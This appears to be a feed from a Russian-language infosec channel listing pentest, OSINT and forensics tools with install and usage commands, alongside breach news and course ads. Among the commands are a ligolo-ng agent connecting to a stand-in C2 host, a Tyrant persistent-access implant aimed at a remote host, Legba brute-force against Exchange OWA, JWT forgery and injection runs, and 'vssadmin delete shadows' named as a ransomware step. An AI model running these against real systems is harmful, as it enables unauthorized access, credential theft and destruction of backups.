34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
Qu1cksc0pe: Многофункциональный инструмент для статического и динамического анализа вредоносного ПО
Qu1cksc0pe — это универсальная платформа с открытым исходным кодом для статического и динамического анализа вредоносного программного обеспечения. Инструмент предназначен для исследования широкого спектра файлов: от исполняемых binaries Windows, Linux и macOS до документов, APK-файлов, архивов и сценариев PowerShell. Основная цель — предоставить исследователям безопасности максимальный объем информации о подозрительных файлах, помогая понять их функциональность и потенциальные угрозы.
pipх install quickscope
quickscope -h
python quickscope --file suspicious_file.exe --analyze
python quickscope --file unknown_sample.exe --analyze --vtFile
python quickscope --file invoice.doc --docs
#cтатический анализ
python quickscope --file malicious.apk --analyze
#динамический анализ (с подключенным устройством)
python quickscope --file malicious.apk --watch
python quickscope --folder ./malware_collection --hashscan
python quickscope --file suspicious_sample.exe --analyze --report | jq '.iocs'
JWT_TOOL
jwt_tool - это набор инструментов для проверки, подделки, сканирования и изменения JWT (JSON Web Tokens).
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool/
python3 jwt_tool.py <JWT_TOKEN>
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -M pb
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -X i -I -pc name -pv admin
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -I -hc kid -hv custom_sqli_vectors.txt
PacketSender: Утилита для отправки и приема сетевых пакетов
PacketSender — это кроссплатформенное приложение с открытым исходным кодом, предназначенное для отправки и приема TCP, UDP, SSL-пакетов, а также HTTP/HTTPS-запросов. Инструмент предоставляет графический интерфейс и возможности командной строки, позволяя тестировать сетевое взаимодействие, отлаживать серверные приложения и выполнять диагностику сетевых протоколов.
sudo apt install packetsender
packetsender —h
packetsender -u 192.168.1.100 8080 "Hello UDP"
packetsender -l -t -b 8080
packetsender --rate 20 --name "Test Packet"
#режим сервера для приема данных
packetsender -l -t -b 9999
#отправка тестовых данных из другого окна
packetsender -t localhost 9999 "TEST"
packetsender -s expired.packetsender.com 443 "GET / HTTP/1.0\r\n\r\n"
packetsender --bps 1000000 --num 10000 --name "Status Check"
Zero-click через стикер: 9.8 и молчание Telegram
Получил стикер — устройство скомпрометировано. Без клика, без уведомления. Именно это описывает ZDI-CAN-30207 — и именно это Telegram отрицает.
🔍 Оценка CVSS 9.8 — не маркетинг. Математика за ней конкретна: метрика UI:N (zero-click) даёт коэффициент 0.85 вместо 0.62 при клике. Разница — 9.8 против 8.1. Оба сценария критичны, но zero-click означает массовую эксплуатацию без единого действия жертвы.
⚙️ Аналог по вектору — CVE-2019-3568, buffer overflow в WhatsApp VoIP: идентичный CVSS, идентичная схема. Статус ZDI-CAN-30207 сейчас — disputed: ZDI верифицировал, вендор отрицает. Разбираем CVSS-математику, хронологию disclosure и методы инструментирования клиента для мониторинга.
Полный разбор:
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/
🚩 Новые задания на платформе HackerLab!
👩💻 Категория Pentest Machines — Грузоперевозки
Приятного хакинга!
Простой, легкий и быстрый инструмент, который позволяет пентестерам создавать туннели на основе обратного TCP/TLS-соединения с использованием интерфейса tun (без необходимости в SOCKS). Поддерживаются протоколы TCP, UDP, ICMP.
apt install ligolo-ng. go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
./proxy -autocert
./proxy -selfcert
./agent -connect attacker_c2_server.com:11601
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000
session необходимо выбрать нужного агента и далее запустить туннелирование на прокси-сервере, используя имя интерфейса.
Один клик — и роутер под контролем атакующего
💀 Открыл письмо, кликнул по ссылке — браузер молча отправил POST-запрос на 192.168.1.1. Без пароля. Без уведомления. Добро пожаловать в CVE-2025-15101.
🔍 Связка CSRF + OS Command Injection в роутерах ASUS (прошивка 3.0.0.6_102 и ниже) даёт атакующему root shell через браузер жертвы. Почему это критично:
• httpd на ASUS работает от root — команды уходят сразу с максимальными привилегиями
• сессия админа в AsusWRT не истекает часами — окно атаки всегда открыто
• нет WAF, CSP, SIEM — атака проходит в тишине
⚠️ Аналогичный паттерн в AsusWRT фиксировали ещё в 2018-м. Номера CVE меняются — архитектура нет.
Полный разбор kill chain, лабораторный стенд и чеклист митигации:
https://codeby.net/threads/cve-2025-15101-csrf-os-command-injection-v-routerakh-asus-polnaya-karta-uyazvimosti-ot-klika-do-root-shell.92554/
🚨 Российский хакер арестован!
🔗 Российский хакер приговорен к 2 годам лишения свободы за атаки с использованием ботнета TA551, распространявшего программу-вымогатель.
🎇 Министерство юстиции США сообщило*, что гражданин России приговорен к двум годам лишения свободы за управление ботнетом, который использовался для осуществления атак с применением программ-вымогателей против американских компаний.
🪧 40-летний Илья Ангелов из Тольятти (нет, не Италия) также был оштрафован на 100 000 долларов. Ангелов, использовавший в сети псевдонимы «milan» и «okart», предположительно, в период с 2017 по 2021 год был соруководителем российской киберпреступной группы, известной как TA551 (также известной как ATK236, G0127, Gold Cabin, Hive0106, Mario Kart, Monster Libra, Shathak и UNC2420 ).
💵 Главной целью атак была перепродажа доступа другим преступным группам, которые использовали его для вымогательства с помощью программ-вымогателей. В период с августа 2018 года по декабрь 2019 года TA551 предоставила группе BitPaymer, занимавшейся распространением программ-вымогателей, доступ к своему ботнету, что позволило этой группировке атаковать 72 американских корпораций. В результате было выплачено более 14,17 миллионов долларов в виде вымогательских платежей.
✉️ В феврале 2021 года, фишинговые электронные письма, содержащие защищенные паролем архивы, обманом заставляли получателей открывать документы Microsoft Word с поддержкой макросов, что приводило к развертыванию программы для загрузки макросов под названием MOUSEISLAND. Вредоносное ПО служило каналом для вторичной полезной нагрузки, получившей кодовое название PHOTOLOADER, которая, в конечном итоге, установила IcedID. И MOUSEISLAND, и PHOTOLOADER приписываются TA551.
Источник: https://www.justice.gov/usao-edmi/pr/russian-cybercriminal-sentenced-prison-using-botnet-steal-millions-american-businesses
#russia #usa #hacker #ta551
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🎯 enject — защита .env секретов от утечек через AI и код
enject — это open source-инструмент, который скрывает чувствительные данные из .env файлов, предотвращая их утечку при работе с AI, логированием и сторонними сервисами. Ранее проект назывался enveil.
git clone https://github.com/greatscott/enject
cd enject
cargo build --release
cd your-project
enject init
👮 Россия арестовала киберпреступника!
⏺️ В России арестован администратор LeakBase за масштабную операцию кражи учетных данных.
🪧 По данным ТАСС и новостного сайта МВД, подозреваемый является жителем города Таганрога. Сообщается, что он был задержан за создание и управление криминальным сайтом, позволявшим торговать украденными личными базами данных с 2021 года.
🕸 «На платформе хранились сотни миллионов учетных записей пользователей, банковские реквизиты, имена пользователей и пароли, а также корпоративные документы, полученные путем взлома», — заявил официальный представитель МВД России. «Более 147 000 пользователей, зарегистрированных на форуме, могли покупать и продавать эти данные, а также использовать их для совершения мошеннических действий против граждан».
🌐 Министерство юстиции США заявило, что этот форум для киберпреступников был одним из крупнейших в мире центров, где киберпреступники покупали и продавали украденные данные и инструменты для киберпреступлений.
💵 Данный форум включал сотни миллионов учетных данных и финансовой информации, такой как номера кредитных и дебетовых карт, банковские счета, имена пользователей и связанные с ними пароли, которые могли быть использованы для осуществления атак с целью захвата учетных записей.
❗️ Теперь посетителей сайта встречает сообщение: «В ходе специальной операции Бюро специальных технических мероприятий Министерства внутренних дел России форум LeakBase был закрыт навсегда. Незаконные действия в сфере компьютерной информации, а также нарушения конституционных прав и свобод личности и граждан влекут за собой уголовную ответственность в соответствии с российским законодательством».
❓ Как вы считаете, доведут дело до конца?
#leakbase #russia #police
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🔑 Gixy-Next — инструмент для анализа безопасности конфигураций Nginx
Gixy — это open source-анализатор конфигураций Nginx, который помогает находить потенциальные уязвимости, ошибки и небезопасные настройки. Инструмент особенно полезен как для DevOps задач так и для проведения пентеста web-инфраструктуры. Он автоматически проверяет конфигурационные файлы и выявляет проблемы, которые могут привести к утечкам данных, обходу ограничений или выполнению вредоносных запросов.
pip3 install gixy-next
gixy /etc/nginx/nginx.conf
gixy /etc/nginx/
🔁 Пятничный опрос
Сегодня проверим, насколько ты ориентируешься в nmap
Подсказка:
nmap - это утилита для сканирования сети, которая используется для обнаружения хостов, открытых портов, сервисов и их версий, а также анализа безопасности сети.Читать полностью…
Полностью настраиваемая платформа для составления отчетов о тестировании на проникновение, предназначенная для специалистов в области кибербезопасности.
sudo apt update
sudo apt install -y sed curl openssl uuid-runtime coreutils
curl -fsSL https://get.docker.com | sudo bash
bash <(curl -s https://docs.sysreptor.com/install.sh)
http://127.0.0.1:8000/
User Scanner: Инструмент OSINT для проверки наличия учетных записей
User Scanner — это инструмент OSINT с открытым исходным кодом, предназначенный для проверки наличия учетных записей по электронной почте или имени пользователя на множестве платформ. Инструмент объединяет в себе возможности сканирования email-адресов и имен пользователей, обеспечивая быструю и точную оценку присутствия целевых учетных данных в социальных сетях, разработческих платформах, форумах и других интернет-сервисах.
pipx install user-scanner
user-scanner -h
user-scanner -e name@gmail.com
user-scanner -u name
user-scanner -v -e name@gmail.com
#cканирование списка email-адресов
user-scanner -ef emails.txt
#cканирование списка имен пользователей
user-scanner -uf usernames.txt
user-scanner -u name --only-found
Стеганография в изображениях
Основные инструменты:
💻 zsteg - комбайн по работе с PNG и BMP
gem install zsteg
zsteg -a pic.png
pip install --user git+https://github.com/Hedroed/png-parser
png-parser pic.png
sudo apt install steghide
steghide extract -sf pic.jpg
sudo apt install ./stegseek_0.6-1.deb
stegseek pic.jpg rockyou.txt
pip3 install stegoveritas
stegoveritas pic.png
java -jar StegSolve.jar
exiftool pic.png
sudo apt install pngcheck
pngcheck -v pic.png
pip3 install stegpy
stegpy pic.png
🌐STEWS — инструмент для тестирования и перечисления WebSockets.
🎯Возможности
⏺️Нахождение конечных точек WebSockets, путем тестирования перечня доменов. Использует модифицированную версию ZGrab2 для проверки URL-адресов на поддержку WebSocket путем отправки первой части процедуры установления соединения WebSocket.
⏺️Определение, какой сервер WebSockets работает на конечной точке:
использует различия на уровне реализации в популярных реализациях WebSocket, чтобы попытаться идентифицировать запущенные серверы WebSocket. STEWS использует функции сервера как в процессе установления соединения WebSocket (с использованием протокола HTTP), так и в рамках протокола WebSocket (с использованием протокола WebSocket).
⏺️Проверка, не подвержен ли сервер WebSockets известным уязвимостям CVE или другим уязвимостям WebSockets: CSWSH (перехват межсайтовых веб-сокетов), CVE-2020-27813,CVE-2020-7662 и CVE-2020-7663, CVE-2021-32640.
Что такое WebSockets❓
WebSocket обеспечивает постоянное соединение между клиентом и сервером. Данные передаются в обе стороны без задержек - сообщения в чате приходят сразу, а игровые действия синхронизируются в реальном времени. Появление WebSocket стало прорывом для сервисов, где важна мгновенная реакция.
➡️Установление соединения. Соединение WebSocket начинается с обычного HTTP-запроса, в который включается заголовок Upgrade,сообщающий о желании перейти на протокол Websocket. Этот процесс называется Websocket-handshake
➡️Обмен данными. После успешного “рукопожатия” устанавливается постоянное соединение и данные могут передаваться в реальном времени в обе стороны без необходимости отправлять новый запрос.
Использование
1️⃣Поиск уязвимостей представляет собой выбор из четырех возможных тестов. Ниже представлен выбор четвертого теста для проверки CVE-2020-27813.
python3 STEWS-vuln-detect.py -4 -n -u 127.0.0.1:8084
python3 STEWS-fingerprint.py -1 -k -u streamer.finance.yahoo.com
STEWS-discovery.sh
PentestAgent
⏺️ PentestAgent — это передовой фреймворк для автоматизированного пентеста, который использует большие языковые модели (LLM) и мультиагентную архитектуру для выполнения задач по тестированию на проникновение с минимальным участием человека. Существует две основные версии продукта: академическая (исследовательский проект) и практическая (инструмент для реального использования).
🧠 Академическая версия:
Это оригинальный проект, представленный на конференции ACM AsiaCCS группой исследователей из Северо-Западного университета, Чжэцзянского университета и Ant Group. Фреймворк построен на мультиагентной коллаборации, где каждый агент отвечает за свой этап пентеста в соответствии со стандартом PTES (Penetration Testing Execution Standard): Reconnaissance Agent, Search Agent, Planning Agent и Execution Agent
Исследователи создали бенчмарк на основе 67 целей из VulHub и HackTheBox (различные CWE и уровни сложности). Результаты при использовании GPT-4 :
➡️ Общая успешность: 74.2% (у GPT-3.5 — 60.6%)
➡️ Простые задачи: 100% завершения на этапах разведки и анализа
➡️ Сложные задачи: успешность снижается до 50% на этапе разведки
Сравнение с PentestGPT показало значительное преимущество в скорости: этап разведки занял 220 секунд против 1199 секунд.
🔑 Практическая версия:
Параллельно с академическим проектом существует активно развивающийся open-source инструмент от сообщества GH05TCREW на GitHub.
❗️ Требования: Python 3.10+, API ключ OpenAI, Anthropic или другого провайдера (поддерживается LiteLLM)
git clone https://github.com/GH05TCREW/pentestagent.git
cd pentestagent
./scripts/setup.sh
pentestagent -t 192.168.1.1
Бэкап — цель номер один 🎯
Шифровальщик отработал за 47 минут. Когда команда полезла восстанавливаться — репозиторий Veeam зашифрован, каталог tape-библиотеки удалён, VSS-снимки стёрты за двое суток до запуска payload.
Это не баг шифровальщика — это Recovery Denial: атакующие методично уничтожают бэкапы до старта шифрования. По данным Mandiant M-Trends 2025, уничтожение возможностей восстановления — одна из самых частых тактик ransomware-группировок. Бэкап — не страховка, а первая мишень. 🔥
Что делают атакующие в первую очередь:
• vssadmin delete shadows — VSS за дни до шифрования
• Останавливают службы Veeam и удаляют SQL-каталог
• Ищут Veeam-серверы через AD и ломятся по доменным учёткам.
Подробный разбор:
https://codeby.net/threads/recovery-denial-zashchita-rezervnykh-kopii-ot-ransomware-taktiki-atakuyushchikh-i-metody-protivodeistviya.92571/
❗️ Сертификаты в HackerLab
В HackerLab запускается сертификация. На текущий момент сертификат доступен участникам, успешно завершившим курс SQL Injection Master и сдавшим итоговый экзамен.
Экзамен представляет собой практическую эксплуатацию уязвимостей в изолированной инфраструктуре. Вы не отвечаете на вопросы - вы атакуете систему, находите уязвимости и шаг за шагом развиваете атаку.
Это не просто «галочка», а результат, подтверждённый практикой.
🎁 В честь запуска сертификации дарим промокод на скидку 20% для подписки PRO. Действует до 30 апреля:
PRO20
Друзья, напоминаем, на каких курсах начинается обучение в апреле! 🚗
Старт 6 апреля:
🙂🙃😄🥲🙂☺️😀 ⤵️
✨Курс «Профессия аналитик центра мониторинга безопасности (SOC)» — запускаем новый курс. Это возможность войти в профессию с нуля: на курсе освоите работу с инцидентами ИБ, научитесь выявлять атаки и анализировать события.
Старт 16 апреля:
✨Курс «Тестирование Веб-приложений на проникновение (WAPT)» — отработаем полный цикл тестирования: от разведки до пост-эксплуатации.
Старт 20 апреля:
✨Курс «OSINT: технология боевой разведки» — освоим профессиональный поиск информации и анализ данных из открытых источников.
Старт 27 апреля:
✨Курс «Профессия DevSecOps - инженер: безопасная разработка» — освоим DevSecOps-инженерию: от автоматизации безопасности до работы с Kubernetes и Terraform.
✨Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)» — ищем и анализируем следы кибервзломов (анализ артефактов, работа с opensource инструментами).
🪧Запишитесь у нашего менеджера @CodebyAcademyBot
Или узнайте подробности и программы курсов — на нашем ➡️ сайте
🌐 MESH — P2P-сеть для удалённой криминалистика Android в любой точке мира
MESH — это open source-инструмент для удалённой форензики мобильных устройств и сетевого мониторинга через зашифрованную peer-to-peer сеть. Он позволяет анализировать устройства (Android / iOS), даже если к ним нет прямого доступа.
В основе — модифицированный протокол Tailscale с self-hosted control plane и разделением управления и трафика.*Ephemeral-сети — это временные сети, которые создаются под конкретную задачу
git clone https://github.com/BARGHEST-ngo/MESH.git
cd mesh/control-plane
docker-compose up -d
docker exec headscale headscale apikeys create --expiration 90d
Инструмент с открытым исходным кодом, предназначенный для аудита безопасности Active Directory, который подключается к контроллеру домена и выполняет 35 автоматических проверок безопасности. Дает быструю оценку неправильных конфигураций Active Directory, а также ищет уязвимые места в инфраструктуре.
# Клонируем репозиторий
git clone https://github.com/yourorg/adpulse.git
cd adpulse
# (Recommended) Создаем виртуальное окружение
python -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
# Устанавливаем зависимости
pip install -r requirements.txt
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!'
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!' --dc-ip 10.0.0.1 --report html --output-dir /tmp/scans
Tyrant
Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.
git clone https://github.com/MartinxMax/Tyrant.git
cd Tyrant/
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]
ParamSpider: Инструмент для извлечения URL из веб-архивов
ParamSpider — утилита с открытым исходным кодом, предназначенная для извлечения URL-адресов, связанных с целевым доменом, из веб-архивов (Wayback Machine). Инструмент автоматически фильтрует «неинтересные» URL, позволяя исследователям безопасности сосредоточиться на потенциально значимых конечных точках для дальнейшего анализа, фаззинга и тестирования.
sudo apt install paramspider
paramspider -h
paramspider -d example.com
paramspider -l domains.txt
paramspider -d example.com -s
paramspider -d example.com --proxy '127.0.0.1:7890'
paramspider -d example.com -p '"><h1>reflection</h1>'
🙃🥰🤣🤪😄
Пользуясь случаем, хотим поделиться с вами мощным отзывом на наш курс по веб-пентесту!
Один из наших выпускников подробно разобрал, как проходит обучение, что реально даёт результат и почему курс часто рекомендуют даже опытные специалисты, за что мы очень благодарны!
👉 обучение строится вокруг практики — от SQLi и XSS до SSRF, SSTI, CMDi, LFI и построения цепочек до RCE
👉 каждую неделю проходят вебинары с куратором, где можно разобрать сложные моменты и задать любые вопросы
👉 обратная связь не формальная — наставники помогают 24/7
👉 финальный модуль — полноценная практика ручного поиска уязвимостей
🚩 Новые задания на платформе HackerLab!
🌍 Категория Веб — Музей
——————————————
🗂 В архив добавлены задания + райтапы:
🔵Веб - RevengeNinja
Приятного хакинга!
🖥️ Legba v1.2.0
Быстрый брутфорсер с поддержкой большого количества протоколов, написан на Rust
Установка:
cargo install legba
legba http.basic \
--username admin \
--password wordlists/passwords.txt \
--target http://localhost:8888/
legba \
-R cookbook/http/ms-exchange/owa.yml \
-U users.txt \
-P passwords.txt \
"host=ms-server.local"
description: Microsoft Exchange bruteforce via OWA endpoint.
author: evilsocket
plugin: http
args:
target: "{$schema or https}://{$host}:{$port or 443}/owa/auth.owa"
http-method: POST
http-success-codes: 302
http-success-string: set-cookie
http-payload: destination={$schema or https}://{$host}:{$port or 443}/&flags=4&username={USERNAME}&password={PASSWORD}
Юго-восточный OSINT: что делать, если компания за границей?
Работа с зарубежными контрагентами требует совсем другого подхода к проверке данных, чем в национальных юрисдикциях.
Как выстроить этот процесс системно — тема новой статьи и ключевой навык, который вы освоите на курсе «OSINT: Технология боевой разведки». Ближайший старт — 20 апреля.
В статье рассказываем:
⏺️Почему нельзя полагаться на один источник
⏺️Как искать ключевые идентификаторы компаний
⏺️Где проверять компании в Индии, Турции, ОАЭ и Китае
⏺️Какие источники дают целостную картину бизнеса
Делимся практическими инструментами и подходами, которые помогут вам уверенно работать с иностранными контрагентами.
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🧿 Sirius — мощный сканер уязвимостей и управления поверхностью атаки
Sirius — это современный open source-инструмент для автоматизированного сканирования уязвимостей, анализа инфраструктуры и управления атакуемой поверхностью (ASM). Он сочетает в себе функции сканера, менеджера активов и платформы для непрерывного мониторинга безопасности.
git clone https://github.com/SiriusScan/Sirius.git
cd Sirius
docker compose -f docker-compose.installer.yaml run --rm sirius-installer
docker compose up -d
🍯 ADTrapper — инструмент для обнаружения атак в Active Directory с помощью honeypot-аккаунтов
ADTrapper — open source-инструмент для обнаружения атак внутри инфраструктуры Microsoft Active Directory. Он создаёт honeypot-объекты и ловушки в AD, которые позволяют выявлять злоумышленников во время разведки, lateral movement и попыток повышения привилегий.
Идея инструмента проста: создать в каталоге приманки, которые выглядят как реальные учётные записи или ресурсы. Любая попытка взаимодействия с такими объектами практически всегда означает подозрительную активность.
git clone https://github.com/MHaggis/ADTrapper.git
cd ADTrapper
cp env.example .env
./deploy.sh
docker-compose up -d
docker-compose exec -T database psql -U postgres < supabase/migrations/0001_simple_setup.sql